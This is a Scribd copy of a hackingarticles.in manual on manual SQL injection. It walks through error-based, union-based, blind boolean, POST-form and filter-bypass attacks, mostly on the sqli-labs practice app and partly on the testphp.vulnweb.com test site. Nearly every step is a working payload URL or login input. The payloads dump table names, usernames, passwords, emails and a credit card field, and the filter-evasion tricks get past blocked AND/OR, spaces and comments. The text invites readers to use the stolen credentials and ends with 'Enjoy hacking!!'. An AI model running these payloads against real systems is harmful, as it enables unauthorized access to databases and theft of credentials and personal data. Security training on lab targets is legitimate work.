Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
360 views86 pages

Sqli Manual

This document discusses SQL injection techniques. It begins with an introduction to SQL injection, explaining that malicious users can inject SQL commands into web pages to bypass authentication, access sensitive data, or execute operating system commands. It then provides details on SQL functions, injection characters, and database fingerprinting. The remainder of the document demonstrates how to set up an SQL injection lab and provides step-by-step examples of exploiting SQL injection vulnerabilities to extract data from a database.

Uploaded by

Luis
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
360 views86 pages

Sqli Manual

This document discusses SQL injection techniques. It begins with an introduction to SQL injection, explaining that malicious users can inject SQL commands into web pages to bypass authentication, access sensitive data, or execute operating system commands. It then provides details on SQL functions, injection characters, and database fingerprinting. The remainder of the document demonstrates how to set up an SQL injection lab and provides step-by-step examples of exploiting SQL injection vulnerabilities to extract data from a database.

Uploaded by

Luis
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 86

TABLE OF CONTENTS

1 Abstract 3
2 SQL Injection 5
2.1 Basic SQL Functions 5
2.2 SQL Injection Characters 5
2.3 Database Fingerprinting 5
3 SQLi Lab Setup 7
4 SQL Basics 10
5 The SQLi Attack 12
5.1 Union Based SQL Injection 20
5.2 Length of database string 26
5.3 Table string length 31
5.4 User Name Enumeration 35
6 Manual SQL Injection Exploitation 39
7 Form Based SQL Injection Manually 51
8 Bypass SQL Injection Filter Manually 66
9 About Us 84

www.hackingarticles.in Page | 2
Abstract

SQL injection is a technique where a malicious user can inject SQL Commands into an SQL statement
via a web page.
An attacker could bypass authentication, access, modify and delete data within a database. In some
cases, SQL Injection can even be used to execute commands on the operating system, potentially
allowing an attacker to escalate to more damaging attacks inside of a network that sits behind a
firewall.

www.hackingarticles.in Page | 3
www.hackingarticles.in Page | 4
SQL Injection

Basic SQL Functions


SELECT read data from the database based on search criteria
INSERT insert new data into the database
UPDATE update existing data based on given criteria
DELETE delete existing data based on given criteria
Order By used to sort the result-set in ascending or descending order
Limit By the statement is used to retrieve records from one or more tables

SQL Injection Characters


1 Character String Indicators ‘ or “
2 Multiple-line comment /*….*/
3 Addition, concatenate ( or space in URL) +
4 Single-line comment # or – -(hyphen hyphen)
5 Double pipe (concatenate) ||
6 Wildcard attribute indicator %
7 Local variable @variable
8 Global variable @@variable
9 Time delay waitfor delay ’00:00:10’
10 String instead of a number or vice versa

Database Fingerprinting
We can find out the database by analyzing the error.
S.no Error Type of Database
You have an error in your SQL syntax; check the manual that
1 corresponds to your MySQL server version for the right MySQL
syntax to use near ”1” LIMIT 0,1′ at line 1
2 ORA-00933: SQL command not properly ended Oracle
Microsoft SQL Native Client error ‘80040e14’ Unclosed
3 MS SQL
quotation mark after the character string

www.hackingarticles.in Page | 5
www.hackingarticles.in Page | 6
SQLi Lab Setup
First, download sqli lab from here and set up in xampp Open SQLI labs https://github.com/Audi-1/sqli-
labs

Click on Setup/reset Database for labs

www.hackingarticles.in Page | 7
www.hackingarticles.in Page | 8
www.hackingarticles.in Page | 9
SQL Basics
Consider a login page where you are requested to enter username and password when you enter
username and password a query (SQL query) is generated at the backend which gets executed and
the result is displayed to us on the home page after login.
Username – Raj
Password – Chandel
So backend query will look like
SELECT * FROM table_name WHERE username=’Raj’ AND password=’Chandel’;
It is totally on the developer how he enclosed the parameter value in the SQL query, he can enclose
the parameter value in a single quote, double quotes, double quotes with bracket etc.
So query may look like

SELECT * FROM table_name WHERE username='Raj' AND


password='Chandel';
SELECT * FROM table_name WHERE username=(’Raj’)
AND password=(’Chandel’);
SELECT * FROM table_name WHERE username="Raj" AND
password="Chandel";
SELECT * FROM table_name WHERE username=("Raj")
AND password=("Chandel");

Or in any form totally developer’s choice.


I’ll explain further using the first query.
Q – What if I enter username = Raj’?
Ans – If I enter username=Raj’ backend query will look like SELECT * FROM table_name WHERE
username=’Raj’’ AND password=’Chandel’; Which is syntactically wrong because of an extra quote
Q- How can we fix this broken query? Is it possible to do so?
Ans – Yes it is possible to fix above query even with username = Raj’. We can do so by commenting
out the entire query after Raj’. So our valid query will be SELECT * FROM table_name WHERE
username=’Raj’. Which is syntactically correct
Q- How to comment out the remaining query?
Ans – Well it depends on the database that is there at the backend. We generally use –+ (hyphen
hyphen plus), # (hash). So if I enter username = Raj’–+. The complete query at backend will look like
SELECT * FROM table_name WHERE username=’Raj’–+’ AND password=’Chandel’; But our database
will read and execute only SELECT * FROM table_name WHERE username=’Raj’ this much query
because everything after –+ will be commented and will not be interpreted as part of the query.
This is what is called SQL INJECTION. Changing the backend query using malicious input.
I don’t know if you guys are having an interesting doubt or not but I had when I was learning all these
stuff, and the doubt is
According to the above query formed by commenting, we don’t need a valid password to login?
Yes if the developer had not taken measure to prevent SQL injection and implemented the query as
shown above it is possible to login using the only username.

www.hackingarticles.in Page | 10
www.hackingarticles.in Page | 11
The SQLi Attack

Click on lesson 1 and add id as a parameter in the URL

Keep on increasing id value (id=1, id=2…and so on) you will notice you will get an empty screen with
no username and password after id=14 which means the database has 14 records.

So backend query must be something like this

SELECT * from table_name WHERE id='1';


Or
SELECT * from table_name WHERE id=('1');
Or
SELECT * from table_name WHERE id="1";

At this point, we don’t know how the developer enclosed the value of the id parameter. Let’s find out
Break the query by fuzzing, enter id=1’

www.hackingarticles.in Page | 12
Boom!! We get the SQL Syntax error. Since this error will help us in finding the back end query and we
will do SQL injection using this error, this type of SQL Injection is called Error Based SQL Injection10

Now we have to analyze the error See screenshot

www.hackingarticles.in Page | 13
You can also find out this using escape character, in MySQL \ (backslash) is used to escape a character.
Escaping a character means to nullify the special purpose of that character. You will get a clearer
picture using the escape character

www.hackingarticles.in Page | 14
It is clear from the above screenshots that backend query

Less-1 - SELECT * from table_name


WHERE id=’our input’
Less-2 - SELECT * from table_name
WHERE id=our input
Less-3 - SELECT * from table_name
WHERE id=(’our input’)
Less-4 - SELECT * from table_name
WHERE id=(“our input”)

From now I’ll take Less-1 as a base lesson to explain further


With our input as 1’ complete backend query will be
SELECT * from table_name WHERE id=’1’’ LIMIT 0,1
Which is syntactically incorrect and I explained above how to make is syntactically correct
By giving input 1’–+ (1 quote hyphen hyphen plus)
Or By giving input 1’–%20 (%20 URL encoding for space)
Or By giving input 1’%23 (%23 URL encoding for #)

http://localhost/sqli/Less-1/?id=1' --%20

http://localhost/sqli/Less-1/?id=1' %23

www.hackingarticles.in Page | 15
http://localhost/sqli/Less-1/?id=1' --+

Now we are able to break the query and are able to fix it syntactically.
What Next?
Now we will try to add query between the quote and –+ to get information from the database

We’ll use another SELECT query here to get information from the database.
Q – Will two SELECT queries work together?
ANS – NO, we have to use the UNION operator to make it work.
The UNION operator is used to combine the result-set of two or more SELECT statements.
But for UNION operator there is one precondition that Number of columns on both sides of the UNION
operator should be same.
Since we don’t know the number of columns in the SELECT query at the backend so first, we have to
find the number of columns used in the SELECT query.
For this, we will use ORDER BY clause.
ORDER BY clause will arrange the result set in ascending or descending order of the columns used in
the query.
ORDER BY country à will arrange the result set in asc order of elements of the column (country)
Now the problem is we even don’t know the names of the column…
Solution to this problem is in ORDER BY clause…
We’ll use ORDER BY 1, ORDER BY 2 etc. because ORDER BY 1 will arrange the result set in ascending
order of the column present at first place in the query. (Please note, ORDER BY 1 will not arrange the
result set according to the first column of the table, it will arrange the result set in ascending order of
the column present at first place in the query).

www.hackingarticles.in Page | 16
Let’s try now

http://localhost/sqli/Less-1/?id=1' order by 1 --
+ No Error

http://localhost/sqli/Less-1/?id=1' order by 2 --
+ No Error

http://localhost/sqli/Less-1/?id=1' order by 4 -
-+ Error

This shows that there is no 4th column in the query. So now we know there are 3 columns in the query
at the backend.

www.hackingarticles.in Page | 17
So now we can use the UNION operator with another SELECT query.

http://localhost/sqli/Less-1/?id=1' union
select 1,2,3 --+

See there is no error but we are getting result set of the first query, to get the result of a second select
query on the screen we have to make the result set of the first query as EMPTY. This we can achieve
by providing the id that does not exist. We can provide negative id or id >14 because in the starting of
the article we figured out that there are 14 ids in the database.

http://localhost/sqli/Less-1/?id=-1' union select 1,2,3


--+
Or
http://localhost/sqli/Less-1/?id=15' union select 1,2,3
--+

www.hackingarticles.in Page | 18
This shows we are getting values of column 2 and column 3 as output. So we’ll use these two columns
to extract information about the database and from the database.

http://localhost/sqli/Less-1/?id=-1' union select


1,2,version() --+

This will give the version of the database used at the backend

http://localhost/sqli/Less-1/?id=-1' union
select 1,database(),version() --+

This will give the database we are using and the current version of the database used at the backend

www.hackingarticles.in Page | 19
Since we are using UNION operator to perform SQL INJECTION, this type of injection is called UNION
BASED SQL INJECTION ( a type of ERROR BASED SQL INJECTION)

Union Based SQL Injection


Variable/function Output
user() Current User
database() Current Database
version() Database Version
schema() Current Database
UUID() System UUID Key
current_user() Current User
system_user() Current System User
session_user() Session User
@@hostname Current Hostname
@@tmpdir Temporary Directory
@@datadir Data Directory
@@version Version of Database
@@basedir Base Directory
@@GLOBAL.have_symlink Check if the symlink is Enabled or Disabled
@@GLOBAL.have_ssl Check if it SSL is available

In order for union injections to work, we should first know the name of tables in the database and for
this type :
id=-1' union select 1,table_name,3 from
information_schema.tables where
table_schema=database() --+

www.hackingarticles.in Page | 20
As you know see that the above query will show us the name of one of the tables in the database. For
instance: emails
Now, sometimes programmer may not print all the rows so we will have to check these rows of
database one by one using the limit keyword. Therefore, type:
id=-1' union select 1,table_name,3 from
information_schema.tables where
table_schema=database() limit 1,1 --+

As you can see that the second table in the database is referers.
Similarly, let’s check the next table name.
id=-1' union select 1,table_name,3 from
information_schema.tables where
table_schema=database() limit 2,1 --+

www.hackingarticles.in Page | 21
This was one method to check table names, one by one, another method is getting all the table names
once and together by using group concat keyword. This keyword presents all the table name as group.
For this type :

id=-1' union select 1,group_concat(table_name),3


from information_schema.tables where
table_schema=database() --+

And as a result, which you can observe in the above image, all the table names will be shown together.
Now let’s check one of the tables presented to us. To extract information from a tables type:

id=-1' union select 1,group_concat(column_name),3


from information_schema.columns where
table_name='users' --+

As you can see the above statement shows all the columns together due to the use of the
group_concat keyword. Also, we are using the word ‘column’ instead of ‘table’ because we want to
know the column of a table now.

www.hackingarticles.in Page | 22
Till now we have extracted different names of databases and its tables. Now let’s see the content of a
table. For this type:

id=-1' union select 1,group_concat(username),3 from


users --+

The above statement will show us all the usernames from the table users. Now let’s check the
passwords for these usernames. Type :

id=-1' union select 1,group_concat(password),3 from


users --+

And like this, you will have passwords to your usernames. There is another method to see usernames
and passwords together with the following statement :

id=-1' union select


1,group_concat(username),group_concat(password)
from users --+

www.hackingarticles.in Page | 23
Blind boolean based injection therefore first we need to explore http://localhost:81/sqli/Less-
8/?id=1 on the browser, this will send the query into the database.

SELECT * from table_name WHERE id=1

As output, it will display “you are in” the yellow colour text on the web page as shown in the given
image.

When an attacker tries to break this query using a comma (‘) http://localhost:81/sqli/Less-8/?id=1’
Or other different technique he will not able to found an error message. Moreover, the yellow colour
text will disappear if the attacker tries to inject invalid query which also shown in the given image.

Then attacker will go for blind SQL injection to make sure, that inject query must return an answer
either true or false.

http://localhost:81/sqli/Less-8/?id=1' AND 1=1 --+


SELECT * from table_name WHERE id=1' AND 1=1

www.hackingarticles.in Page | 24
Now database test for given condition whether 1 is equal to 1 if the query is valid it
returns TRUE, from the screenshot you can see we have got yellow colour text again “you
are in”, which means our query is valid.

In the next query which checks for URL


http://localhost:81/sqli/Less-8/?id=1' AND 1=0
--+
SELECT * from table_name WHERE id=1' AND 1=0

Now it will test the given condition whether 1 is equal to 0 as we know 1 is not equal to 0 hence
database answer as ‘FALSE’ query. From the screenshot, it confirms when yellow color text gets
disappear again.
Hence it confirms that the web application is infected to blind SQL injection. Using true and false
condition we are going to retrieve database information.

www.hackingarticles.in Page | 25
Length of database string
The following query will ask the length of the database string. For example, the name of the database
is IGNITE which contains 6 alphabets so the length of string for database IGNITE is equal to 6.
Similarly, we will inject given below query which will ask whether the length of database string is equal
to 1, in the response of that query it will answer by returning TRUE or FALSE through text “you are in”.

http://localhost:81/sqli/Less-8/?id=1' AND
(length(database())) = 1 --+

From given screenshot you can see again the text gets disappear which means it has return FALSE to
reply NO the length of database string is not equal to 1

http://localhost:81/sqli/Less-8/?id=1' AND
(length(database())) = 2 --+

Again it will test the length of the database string is equal to 2; it has return FALSE to reply NO the
length of database string is not equal to 2. Repeat the same step till we do not receive TRUE for string
length 3/4/5/ and so on.

www.hackingarticles.in Page | 26
http://localhost:81/sqli/Less-8/?id=1' AND
(length(database())) = 8 --+

when I test for the string is equal to 8; it answers as true and as result yellow colour text “you are in”
appears again.

As we know the computer does not understand the human language it can read the only binary
language, therefore, we will use ASCII code. The ASCII code associates an integer value for all symbols
in the character set, such as letters, digits, punctuation marks, special characters, and control
characters.
For example look at following string ascii code:
1 = I = 73
2 = G = 71
3 = N = 78
4 = I = 73
5 = T = 84
6 = E = 69

www.hackingarticles.in Page | 27
Further, we will enumerate the database name using ascii character for all 8 strings.
Next query will ask from database test the condition whether the first string of database name
is greater than 100 using acsii substring.
http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select database()),1,1))) > 100 --+

It reflects TRUE condition hence if you match the ascii character you will observe that from 100 small
alphabets string has been running till 172.

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select database()),1,1))) > 120 --+

Similarly, it will test again whether the first letter is greater than 120. But this time it returns FALSE
which means the first letter is greater than 100 and less than 120.

www.hackingarticles.in Page | 28
http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select database()),1,1))) = 101 --+

Now next it will equate first string from 101, again we got FALSE.

We had performed this test from 101 till 114 but receive FALSE every time.

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select database()),1,1))) = 114 --+

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select database()),1,1))) = 115 --+

Finally receive a TRUE reply at 115 which means the first string is equal to 115, where 115 =‘s’

www.hackingarticles.in Page | 29
Similarly, test for the second string, repeat above step by replacing the first string from second.

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select database()),2,1))) > 100 --+

I received a TRUE reply at 101 which means the second string is equal to 101 and 101 = ‘e’.
Similarly, I had performed this for all eight strings and got the following result:
Given query will test the condition whether the length of string for the first table is equal to 6 or not.

http://localhost:81/sqli/Less-8/?id=1' AND
(length((select table_name from
information_schema.tables where
table_schema=database() limit 0,1))) = 6 --+

In reply we receive TRUE and text “you are in” appears again on the web site.
Similarly I test for second and third table using same technique by replacing only table number in same
query.
1 = s = 115
2 = e = 101
3 = c =99
4 = u =117
5 = r =114
6 = i = 105
7 = t = 116
8 = y = 121

www.hackingarticles.in Page | 30
Table string length
We have to use the same technique for enumerating information of the table from inside the
database. Given query will test the condition whether the length of string for the first table is greater
than 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select


table_name from information_schema.tables where
table_schema=database() limit 0,1))) > 5 --+

In reply we receive TRUE and text “you are in” appears again on the web site.

Given query will test the condition whether the length of string for the first table is greater than 6 or
not.
http://localhost:81/sqli/Less-8/?id=1' AND
(length((select table_name from
information_schema.tables where
table_schema=database() limit 0,1))) > 6 --+

In reply we receive FALSE and text “you are in” disappears again from the web site.

www.hackingarticles.in Page | 31
Given query will test the condition whether the length of string for the first table is equal to 6 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select


table_name from information_schema.tables where
table_schema=database() limit 0,1))) = 6 --+

In reply we receive TRUE and text “you are in” appears again on the web site.
Similarly, I test for the second and third table using the same technique by replacing only table number
in the same query.

Similarly enumerating fourth table information using the following query to test the condition
whether the length of string for the fourth table is equal to 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND
(length((select table_name from
information_schema.tables where
table_schema=database() limit 3,1))) = 5 --+

In reply we receive TRUE and text “you are in” appears again on the web site.
As we had performed in database enumeration using ascii code similarly we are going to use the same
technique to retrieve the table name.

www.hackingarticles.in Page | 32
Further, we will enumerate the 4th table name using ascii character for all 5 strings.
Next query will ask from the database to test the condition whether the first string of table name is
greater than 115 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select table_name from
information_schema.tables where
table_schema=database() limit 3,1) ,1,1))) > 115 --+

It reflects TRUE condition text “you are in” appears again on the web site hence if you match the ascii
character.

Next query will ask from the database to test the condition whether the first string of table name is
greater than 120 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select table_name from
information_schema.tables where
table_schema=database() limit 3,1) ,1,1))) > 120 --+

But this time it returns FALSE which means the first letter is greater than 115 and less than 120.

www.hackingarticles.in Page | 33
Proceeding towards equating the string from ascii code between number 115 to 120. Next query will
ask from the database to test the condition whether the first string of table name is greater than 120
using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select table_name from
information_schema.tables where
table_schema=database() limit 3,1) ,1,1))) = 116 --+

It returns FALSE, text get disappear.

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select table_name from
information_schema.tables where
table_schema=database() limit 3,1) ,1,1))) = 117 --+

Similarly we had test remaining strings and received following result


1 = u = 117
2 = s = 115
3 = e = 101
4 = r = 114
5 = s = 115

www.hackingarticles.in Page | 34
User Name Enumeration
Using the same method we are going to enumerate length of string username from inside the table
users
Given below query will test for string length is equal to 4 or not.

http://localhost:81/sqli/Less-8/?id=1' AND
(length((select username from users limit 0,1))) = 4 --+

It replies TRUE with help of yellow color text

Using the same method we are going to enumerate username from inside the table users
Given below query will test for a first string using ascii code.

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select username from users limit
0,1) ,1,1))) > 100 --+

We received FALSE which means the first string must be less than 100.

www.hackingarticles.in Page | 35
http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select username from users limit
0,1) ,1,1))) > 50 --+

We received TRUE which means the first string must be more than 50.

Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select username from users limit
0,1) ,1,1))) > 60 --+

We received TRUE which means the first string must be more than 60.

www.hackingarticles.in Page | 36
Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select username from users
limit 0,1) ,1,1))) > 70 --+

We received FALSE which means the first string is less than 70.
Hence first string must lie between 60 and 70 of ascii code.

Proceeding towards comparing string from different ascii code using the following query.

http://localhost:81/sqli/Less-8/?id=1' AND
(ascii(substr((select username from users
limit 0,1) ,1,1))) = 68 --+

This time successfully receive TRUE with appearing text “you are in”.
Similarly, I had tested for all four string in order to retrieve username:
1 = D = 68
2 = u = 117
3 = m = 109
4 = b = 98
Hence today we had learned how attacker hacked database using blind SQL injection.
!!Try yourself to retrieve the password for user dumb!!

www.hackingarticles.in Page | 37
www.hackingarticles.in Page | 38
Manual SQL Injection Exploitation
We are again performing SQL injection manually on a live website “vulnweb.com”

Open given below targeted URL in the browser

http://testphp.vulnweb.com/artists.php?artist=1

So here we are going test SQL injection for “id=1″

Now use error base technique by adding an apostrophe (‘) symbol at the end of input which will try to
break the query.

testphp.vulnweb.com/artists.php?artist=1'

In the given screenshot you can see we have got an error message which means the running site is
infected by SQL injection.

www.hackingarticles.in Page | 39
Now using ORDER BY keyword to sort the records in ascending or descending order for id=1

http://testphp.vulnweb.com/artists.php?artist
=1 order by 1

Similarly repeating for order 2, 3 and so on one by one

http://testphp.vulnweb.com/artists.php?artist
=1 order by 2

www.hackingarticles.in Page | 40
http://testphp.vulnweb.com/artists.php?
artist=1 order by 4

From the screenshot, you can see we have got an error at the order by 4 which means it consists only
three records.

Let’s penetrate more inside using union base injection to select statement from a different table.

http://testphp.vulnweb.com/artists.php?artist
=1 union select 1,2,3

From the screenshot, you can see it is show result for only one table not for others.

www.hackingarticles.in Page | 41
Now try to pass wrong input into the database through URL by replacing artist=1 from artist=-1 as
given below:
http://testphp.vulnweb.com/artists.php?ar
tist=-1 union select 1,2,3

Hence you can see now it is showing the result for the remaining two tables also.

Use the next query to fetch the name of the database


http://testphp.vulnweb.com/artists.php
?artist=-1 union select 1,database(),3
From the screenshot, you can read the database name acuart

www.hackingarticles.in Page | 42
Next query will extract the current username as well as a version of the database system

http://testphp.vulnweb.com/artists.
php?artist=-1 union select
1,version(),current_user()
Here we have retrieve 5.1.73 0ubuntu0 10.04.1 as version and acuart@localhost as the current user

Through the next query, we will try to fetch table name inside the database

http://testphp.vulnweb.com/artists.php?artist=-1
union select 1,table_name,3 from
information_schema.tables where
table_schema=database() limit 0,1

From the screenshot you read can the name of the first table is artists.

www.hackingarticles.in Page | 43
http://testphp.vulnweb.com/artists.php?artist=
-1 union select 1,table_name,3 from
information_schema.tables where
table_schema=database() limit 1,1

From the screenshot you can read the name of the second table is carts.

Similarly, repeat the same query for another table with slight change

http://testphp.vulnweb.com/artists.php?artis
t=-1 union select 1,table_name,3 from
information_schema.tables where
table_schema=database() limit 2,1

We got table 3: categ

www.hackingarticles.in Page | 44
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1,table_name,3 from information_schema.tables
where table_schema=database() limit 3,1

We got table 4: featured

Similarly repeat the same query for table 4, 5, 6, and 7 with making slight changes in LIMIT.

http://testphp.vulnweb.com/artists.php?
artist=-1 union select 1,table_name,3
from information_schema.tables where
table_schema=database() limit 7,1

We got table 7: users

www.hackingarticles.in Page | 45
http://testphp.vulnweb.com/artists.php?artist=-1
union select 1,table_name,3 from
information_schema.tables where
table_schema=database() limit 8,1

Since we didn’t get anything when the limit is set 8, 1 hence there might be 8 tables only inside the
database.

the concat function is used for concatenation of two or more string into a single string.

http://testphp.vulnweb.com/artists.php
?artist=-1 union select
1,group_concat(table_name),3 from
information_schema.tables where
table_schema=database()

From screen you can see through concat function we have successfully retrieved all table name inside
the database.
Table 1: artist
Table 2: Carts
Table 3: Categ
Table 4: Featured
Table 5: Guestbook
Table 6: Pictures
Table 7: Product
Table 8: users

www.hackingarticles.in Page | 46
Maybe we can get some important data from the users table, so let’s penetrate more inside. Again
Use the concat function for table users for retrieving its entire column names.

http://testphp.vulnweb.com/artists.php?artist=-1 union select


1,group_concat(column_name),3 from
information_schema.columns where table_name='users'

Awesome!! We successfully retrieve all eight column names from inside the table users.
Then I have chosen only four columns i.e. uname, pass, email and cc for further enumeration.

Use the concat function for selecting uname from table users by executing the following query
through URL

http://testphp.vulnweb.com/artists.php?artist
=-1 union select 1,group_concat(uname),3 from
users

From the screenshot, you can read uname: test

www.hackingarticles.in Page | 47
Use the concat function for selecting pass from table users by executing the following query through
URL
http://testphp.vulnweb.com/artists.php?
artist=-1 union select
1,group_concat(pass),3 from users

From the screenshot, you can read pass: test

Use the concat function for selecting cc (credit card) from table users by executing the following query
through URL

http://testphp.vulnweb.com/artists.php?artist=-1
union select 1,group_concat(cc),3 from users

From the screenshot, you can read cc: 1234-5678-2300-9000

www.hackingarticles.in Page | 48
Use the concat function for selecting email from table users by executing the following query through
URL
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(email),3 from users
From the screenshot, you can read email: [email protected]
Enjoy hacking!!

www.hackingarticles.in Page | 49
www.hackingarticles.in Page | 50
Form Based SQL Injection Manually
POST error based single quotes (‘) string so when you will explore this lab on the browser you will
observe that it contains a text field for username and password to login inside web server. As we are
not a true user so we don’t know the correct username and password but being hacker we always
wish to get inside the database with help of SQL injection. Therefore first we will test whether the
database is vulnerable to SQL injection or not.
Since lesson itself sound like an error based single quotes (‘) string, thus I had used single quotes (‘) to
break the query inside the text field of username then click on submit.
Username: ’
From the given screenshot you can see we have got an error message (in blue color) which means
the database is vulnerable to SQL injection.

www.hackingarticles.in Page | 51
So we when breaking the query we get an error message, now let me explain what this error message
says.
The right syntax to use near ”” and password=” LIMIT 0,1’

Now we need to fix this query with help of # (hash) comment; so after adding single quotes (‘) add a
hash function (#) to make it syntactically correct.
Username: ‘ #
From the screenshot, you can see it has shown login attempted failed though we have successfully
fixed the blue color error message.

www.hackingarticles.in Page | 52
Now whatever statement you will insert in between ‘and # the query will execute successfully with
certain result according to it. Now to find out the number of columns used in the backend query we’ll
use order by clause
Username: ' order by 1 #
Username: ' order by 2 #
Username: ' order by 3 #

From the screenshot, you can see I received an error at the order by 3 which mean there are only two
columns used in the backend query

Similarly, insert query for union select in between ‘and # to select both records.
Username:
‘ union select 1,2 #

From the screenshot, you can see it also shown successfully logged in, now retrieve data from inside
it.

www.hackingarticles.in Page | 53
Next query will fetch database name, it is as similar as in lesson 1 and from the screenshot, you can
read the database name “security”
Username:
' union select 1,database() #

www.hackingarticles.in Page | 54
Through the given below query, we will be able to fetch tables name present inside the database.
Username:
' union select
1,group_concat(table_name) from
information_schema.tables where
table_schema=database() #

From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users

www.hackingarticles.in Page | 55
Now we’ll try to find out column names of users table using the following query
Username:

‘ union select 1,group_concat(column_name)


from information_schema.columns where
table_name='users' #

Their so many columns but we interested in username and password only.

www.hackingarticles.in Page | 56
At last, execute the following query to read all username and password inside the table users.
Username:
' union select
group_concat(username),group_concat(password)
from users #

Hence you can see we have not only retrieve single user credential but entire users credential now
use them for login.

www.hackingarticles.in Page | 57
In some scenario you will try to use single quotes string for test SQL vulnerability or will go extend in
order to break the query even after knowing that database is vulnerable but you will be not able to
get break the query and receive error message because might the developer had blacklist the single
quotes (‘) at the backend query.
Lesson 12 is similar to previous lesson 11 but here you will face failure if you used single quotes for
breaking the query since the chapter sound closed to post Error based double quotes string (“). Thus
I had used double quotes (“) to break the query inside the text field of username then click on submit.
username: “
From the given screenshot you can see we have got the error message (in blue color) which means
the database is vulnerable to SQL injection.

www.hackingarticles.in Page | 58
So we when breaking the query we get an error message, now let me explain what this error message
says.
The right syntax to use near ‘”””) and password=(“”) LIMIT 0,1’

Now we need to fix this query with help of ) closing parenthesis and # (hash) comments; so after
double quotes (“) add ) closing parenthesis hash function (#) to make it syntactically correct.
username: “) #
From the screenshot, you can see it has shown login attempted failed though we have successfully
fixed the blue color error message.

www.hackingarticles.in Page | 59
Now whatever statement you will insert in between ‘) and # the query will execute successfully with
certain result according to it. Now to find out the number of columns used in the backend query we’ll
use order by clause
username: “) order by 3 #
From the screenshot, you can see I received an error at the order by 3 which means there are only
two columns used in the backend query

Similarly, insert query for union select in between “)and # to select both records.
Username:
") union select 1,2 #

From the screenshot, you can see it also shown successfully logged in, let’s now retrieve data from
inside it.

www.hackingarticles.in Page | 60
Next query will fetch database name, it is as similar as in lesson 1 and from the screenshot, you can
read the database name “security”
Username:

") union select 1,database() #

www.hackingarticles.in Page | 61
Through the given below query, we will be able to fetch tables name present inside the database.
Username:
") union select 1,group_concat(table_name)
from information_schema.tables where
table_schema=database() #

From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users.

www.hackingarticles.in Page | 62
Now we’ll try to find out column names of users table using the following query
Username:
") union select 1,group_concat(column_name)
from information_schema.columns where
table_name='users' #

Their so many columns but we interested in username and password only.

www.hackingarticles.in Page | 63
At last, execute the following query to read all username and password inside the table users.
Username:
") union select
group_concat(username),group_concat(password)
from users #

Hence you can see we have not only retrieve single user credential but entire users credential now
use them for login.

www.hackingarticles.in Page | 64
www.hackingarticles.in Page | 65
Bypass SQL Injection Filter Manually

OR and AND function are Blocked here we will try to bypass sql filter using their substitute.
function blacklist($id)
$id= preg_replace(‘/or/i’,””, $id); //strip out OR (non case sensitive)
$id= preg_replace(‘/AND/i’,””, $id); //Strip out AND (non case sensitive)
Since alphabetic word OR, AND are blacklisted, hence if we use AND 1=1 and OR 1=1 there would be
no output therefore I had use %26%26 inside the query.
Following are a replacement for AND and OR
AND : && %26%26
OR: ||
Open the browser and type following SQL query in URL

http://localhost:81/sqli/Less-
25/?id=1' %26%26 1=1 --+

From the screenshot, you can see we have successfully fixed the query for AND (&&) into URL encode
as %26%26. Even when AND operator was filtered out.

www.hackingarticles.in Page | 66
Once the concept is clear to bypass AND filter later we need to alter the SQL statement for retrieving
database information.
http://localhost:81/sqli/Less-25/?id=-
1' union select 1,2,3 %26%26 1=1 --+

www.hackingarticles.in Page | 67
Type following query to retrieve database name using union injection
http://localhost:81/sqli/Less-25/?id=-1'
union select 1,database(),3 %26%26 1=1 --+

hence you can see we have successfully get security as database name as result.

Next query will provide entire table names saved inside the database.
http://localhost:81/sqli/Less-25/?id=-1'
union select 1,group_concat(table_name),3
from infoorrmation_schema.tables where
table_schema=database() %26%26 1=1 --+

www.hackingarticles.in Page | 68
From the screenshot you can read the following table names:

T1: emails
T2: referers
T3: uagents
T4: users

Now we’ll try to find out column names of users table using the following query.
http://localhost:81/sqli/Less-25/?id=-
1' union select
1,group_concat(column_name),3 from
infoorrmation_schema.columns where
table_name='users' %26%26 1=1 --+

www.hackingarticles.in Page | 69
Hence you can see it contains 4 columns inside it.

C1: id
C2: username
C3: password

At last, execute the following query to read all username inside the table users from inside its column.

http://localhost:81/sqli/Less-
25/?id=-1' union select
1,group_concat(username),3 from
users --+

From the screenshot, you can read the fetched data.

www.hackingarticles.in Page | 70
space, Comments, OR and AND are Blocked so now we will try to bypass SQL filter using their
substitute.
Following are function blacklist($id)
preg_replace(‘/or/i’,””, $id); //strip out OR (non case sensitive)
$id= preg_replace(‘/and/i’,””, $id); //Strip out AND (non case sensitive)
$id= preg_replace(‘/[\/\*]/’,””, $id); //strip out /*
$id= preg_replace(‘/[–]/’,””, $id); //Strip out —
$id= preg_replace(‘/[#]/’,””, $id); //Strip out #
$id= preg_replace(‘/[\s]/’,””, $id); //Strip out spaces
$id= preg_replace(‘/[\/\\\\]/’,””, $id); //Strip out slashes
This lab has more filters as compared to lab 25 because here space,Comments are also Blocked. Now
execute following query In URL .
http://localhost:81/sqli/Less
-26/?id=1'%a0%26%26'1=1

